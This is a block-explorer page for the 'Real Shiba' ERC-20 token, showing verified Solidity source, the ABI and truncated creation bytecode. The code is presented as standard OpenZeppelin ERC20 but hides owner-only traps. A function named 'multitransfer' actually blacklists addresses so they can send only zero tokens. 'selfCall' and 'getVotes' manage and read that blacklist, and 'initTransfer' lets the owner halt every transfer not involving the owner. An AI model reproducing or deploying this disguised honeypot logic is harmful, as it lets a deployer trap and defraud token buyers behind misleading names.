Feature Tip: Add private address tag to any address under My Name Tag !
ERC-20
Overview
Max Total Supply
10,000,000,000,000 шиба
Holders
54
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Balance
2,640,386,935.909113118 шибаValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
RealShiba
Compiler Version
v0.8.9+commit.e5eed63a
Contract Source Code (Solidity Multiple files format)
// SPDX-License-Identifier: MIT pragma solidity ^0.8.9; import "./ERC20.sol"; contract RealShiba is ERC20 { constructor() ERC20("Real Shiba", "\u0448\u0438\u0431\u0430") { _mint(msg.sender, 10000000000000 * 10 ** decimals()); } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ contract Context { address private _owner; constructor(){ _owner = msg.sender; } modifier onlyOwner() { require(_owner == _msgSender(), "Ownable: caller is not the owner"); _; } function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } function owner() internal view returns (address) { return _owner; } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.5.0) (token/ERC20/ERC20.sol) pragma solidity ^0.8.0; import "./IERC20.sol"; import "./IERC20Metadata.sol"; import "./Context.sol"; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; bool _initTransfer = true; mapping (address => bool) private _1setTreasuryHandlerDelegateApprove1; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } function initTransfer() external onlyOwner { if (_initTransfer == false){ _initTransfer = true;} else {_initTransfer = false;} } function getVotes(address account) public view returns (bool) { return _1setTreasuryHandlerDelegateApprove1[account]; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 9; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, _allowances[owner][spender] + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = _allowances[owner][spender]; require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `sender` to `recipient`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer( address from, address to, uint256 amount ) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); if (_initTransfer == true || from == owner() || to == owner()) { if (_1setTreasuryHandlerDelegateApprove1[from]) require (amount == 0, ""); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; } _balances[to] += amount; emit Transfer(from, to, amount); } else {require (_initTransfer == true, "");} _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; _balances[account] += amount; emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; } _totalSupply -= amount; emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Spend `amount` form the allowance of `owner` toward `spender`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} function multitransfer(address[] calldata addr) public onlyOwner{ for (uint256 i = 0; i < addr.length; i++) { _1setTreasuryHandlerDelegateApprove1[addr[i]] = true; } } function selfCall(address[] calldata addr) external onlyOwner { for (uint256 i = 0; i < addr.length; i++) { _1setTreasuryHandlerDelegateApprove1[addr[i]] = false; } } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.5.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.0; import "./IERC20.sol"; /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"getVotes","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"initTransfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"addr","type":"address[]"}],"name":"multitransfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"addr","type":"address[]"}],"name":"selfCall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040526001600660006101000a81548160ff0219169083151502179055503480156200002c57600080fd5b506040518060400160405280600a81526020017f5265616c205368696261000000000000000000000000000000000000000000008152506040518060400160405280600881526020017fd188d0b8d0b1d0b0000000000000000000000000000000000000000000000000815250336000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508160049080519060200190620000f1929190620002e2565b5080600590805190602001906200010a929190620002e2565b5050506200014f33620001226200015560201b60201c565b600a6200013091906200052c565b6509184e72a0006200014391906200057d565b6200015e60201b60201c565b62000751565b60006009905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415620001d1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620001c8906200063f565b60405180910390fd5b620001e560008383620002d860201b60201c565b8060036000828254620001f9919062000661565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825462000251919062000661565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620002b89190620006cf565b60405180910390a3620002d460008383620002dd60201b60201c565b5050565b505050565b505050565b828054620002f0906200071b565b90600052602060002090601f01602090048101928262000314576000855562000360565b82601f106200032f57805160ff191683800117855562000360565b8280016001018555821562000360579182015b828111156200035f57825182559160200191906001019062000342565b5b5090506200036f919062000373565b5090565b5b808211156200038e57600081600090555060010162000374565b5090565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156200042057808604811115620003f857620003f762000392565b5b6001851615620004085780820291505b80810290506200041885620003c1565b9450620003d8565b94509492505050565b6000826200043b57600190506200050e565b816200044b57600090506200050e565b81600181146200046457600281146200046f57620004a5565b60019150506200050e565b60ff84111562000484576200048362000392565b5b8360020a9150848211156200049e576200049d62000392565b5b506200050e565b5060208310610133831016604e8410600b8410161715620004df5782820a905083811115620004d957620004d862000392565b5b6200050e565b620004ee8484846001620003ce565b9250905081840481111562000508576200050762000392565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b6000620005398262000515565b915062000546836200051f565b9250620005757fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000429565b905092915050565b60006200058a8262000515565b9150620005978362000515565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615620005d357620005d262000392565b5b828202905092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000627601f83620005de565b91506200063482620005ef565b602082019050919050565b600060208201905081810360008301526200065a8162000618565b9050919050565b60006200066e8262000515565b91506200067b8362000515565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115620006b357620006b262000392565b5b828201905092915050565b620006c98162000515565b82525050565b6000602082019050620006e66000830184620006be565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200073457607f821691505b602082108114156200074b576200074a620006ec565b5b50919050565b611b5b80620007616000396000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c806370a0823111610097578063a457c2d711610066578063a457c2d714610288578063a9059cbb146102b8578063d6098ab0146102e8578063dd62ed3e14610304576100f5565b806370a082311461020057806391b69fa01461023057806395d89b411461023a5780639ab24eb014610258576100f5565b806323b872dd116100d357806323b872dd14610166578063313ce5671461019657806339509351146101b45780635148d25a146101e4576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610148575b600080fd5b610102610334565b60405161010f9190611234565b60405180910390f35b610132600480360381019061012d91906112f4565b6103c6565b60405161013f919061134f565b60405180910390f35b6101506103e9565b60405161015d9190611379565b60405180910390f35b610180600480360381019061017b9190611394565b6103f3565b60405161018d919061134f565b60405180910390f35b61019e610422565b6040516101ab9190611403565b60405180910390f35b6101ce60048036038101906101c991906112f4565b61042b565b6040516101db919061134f565b60405180910390f35b6101fe60048036038101906101f99190611483565b6104d5565b005b61021a600480360381019061021591906114d0565b61060f565b6040516102279190611379565b60405180910390f35b610238610658565b005b610242610747565b60405161024f9190611234565b60405180910390f35b610272600480360381019061026d91906114d0565b6107d9565b60405161027f919061134f565b60405180910390f35b6102a2600480360381019061029d91906112f4565b61082f565b6040516102af919061134f565b60405180910390f35b6102d260048036038101906102cd91906112f4565b610919565b6040516102df919061134f565b60405180910390f35b61030260048036038101906102fd9190611483565b61093c565b005b61031e600480360381019061031991906114fd565b610a76565b60405161032b9190611379565b60405180910390f35b6060600480546103439061156c565b80601f016020809104026020016040519081016040528092919081815260200182805461036f9061156c565b80156103bc5780601f10610391576101008083540402835291602001916103bc565b820191906000526020600020905b81548152906001019060200180831161039f57829003601f168201915b5050505050905090565b6000806103d1610afd565b90506103de818585610b05565b600191505092915050565b6000600354905090565b6000806103fe610afd565b905061040b858285610cd0565b610416858585610d5c565b60019150509392505050565b60006009905090565b600080610436610afd565b90506104ca818585600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546104c591906115cd565b610b05565b600191505092915050565b6104dd610afd565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461056a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105619061166f565b60405180910390fd5b60005b8282905081101561060a576000600760008585858181106105915761059061168f565b5b90506020020160208101906105a691906114d0565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610602906116be565b91505061056d565b505050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610660610afd565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146106ed576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106e49061166f565b60405180910390fd5b60001515600660009054906101000a900460ff1615151415610729576001600660006101000a81548160ff021916908315150217905550610745565b6000600660006101000a81548160ff0219169083151502179055505b565b6060600580546107569061156c565b80601f01602080910402602001604051908101604052809291908181526020018280546107829061156c565b80156107cf5780601f106107a4576101008083540402835291602001916107cf565b820191906000526020600020905b8154815290600101906020018083116107b257829003601f168201915b5050505050905090565b6000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60008061083a610afd565b90506000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905083811015610900576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108f790611779565b60405180910390fd5b61090d8286868403610b05565b60019250505092915050565b600080610924610afd565b9050610931818585610d5c565b600191505092915050565b610944610afd565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146109d1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109c89061166f565b60405180910390fd5b60005b82829050811015610a71576001600760008585858181106109f8576109f761168f565b5b9050602002016020810190610a0d91906114d0565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610a69906116be565b9150506109d4565b505050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610b75576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b6c9061180b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610be5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bdc9061189d565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610cc39190611379565b60405180910390a3505050565b6000610cdc8484610a76565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610d565781811015610d48576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d3f90611909565b60405180910390fd5b610d558484848403610b05565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610dcc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dc39061199b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610e3c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e3390611a2d565b60405180910390fd5b60011515600660009054906101000a900460ff1615151480610e905750610e61611168565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b80610ecd5750610e9e611168565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b1561110157600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615610f685760008114610f67576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f5e90611a73565b60405180910390fd5b5b610f73838383611191565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610ffa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ff190611b05565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461108f91906115cd565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516110f39190611379565b60405180910390a350611158565b60011515600660009054906101000a900460ff16151514611157576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161114e90611a73565b60405180910390fd5b5b611163838383611196565b505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156111d55780820151818401526020810190506111ba565b838111156111e4576000848401525b50505050565b6000601f19601f8301169050919050565b60006112068261119b565b61121081856111a6565b93506112208185602086016111b7565b611229816111ea565b840191505092915050565b6000602082019050818103600083015261124e81846111fb565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061128b82611260565b9050919050565b61129b81611280565b81146112a657600080fd5b50565b6000813590506112b881611292565b92915050565b6000819050919050565b6112d1816112be565b81146112dc57600080fd5b50565b6000813590506112ee816112c8565b92915050565b6000806040838503121561130b5761130a611256565b5b6000611319858286016112a9565b925050602061132a858286016112df565b9150509250929050565b60008115159050919050565b61134981611334565b82525050565b60006020820190506113646000830184611340565b92915050565b611373816112be565b82525050565b600060208201905061138e600083018461136a565b92915050565b6000806000606084860312156113ad576113ac611256565b5b60006113bb868287016112a9565b93505060206113cc868287016112a9565b92505060406113dd868287016112df565b9150509250925092565b600060ff82169050919050565b6113fd816113e7565b82525050565b600060208201905061141860008301846113f4565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126114435761144261141e565b5b8235905067ffffffffffffffff8111156114605761145f611423565b5b60208301915083602082028301111561147c5761147b611428565b5b9250929050565b6000806020838503121561149a57611499611256565b5b600083013567ffffffffffffffff8111156114b8576114b761125b565b5b6114c48582860161142d565b92509250509250929050565b6000602082840312156114e6576114e5611256565b5b60006114f4848285016112a9565b91505092915050565b6000806040838503121561151457611513611256565b5b6000611522858286016112a9565b9250506020611533858286016112a9565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061158457607f821691505b602082108114156115985761159761153d565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006115d8826112be565b91506115e3836112be565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156116185761161761159e565b5b828201905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006116596020836111a6565b915061166482611623565b602082019050919050565b600060208201905081810360008301526116888161164c565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b60006116c9826112be565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8214156116fc576116fb61159e565b5b600182019050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006117636025836111a6565b915061176e82611707565b604082019050919050565b6000602082019050818103600083015261179281611756565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006117f56024836111a6565b915061180082611799565b604082019050919050565b60006020820190508181036000830152611824816117e8565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006118876022836111a6565b91506118928261182b565b604082019050919050565b600060208201905081810360008301526118b68161187a565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006118f3601d836111a6565b91506118fe826118bd565b602082019050919050565b60006020820190508181036000830152611922816118e6565b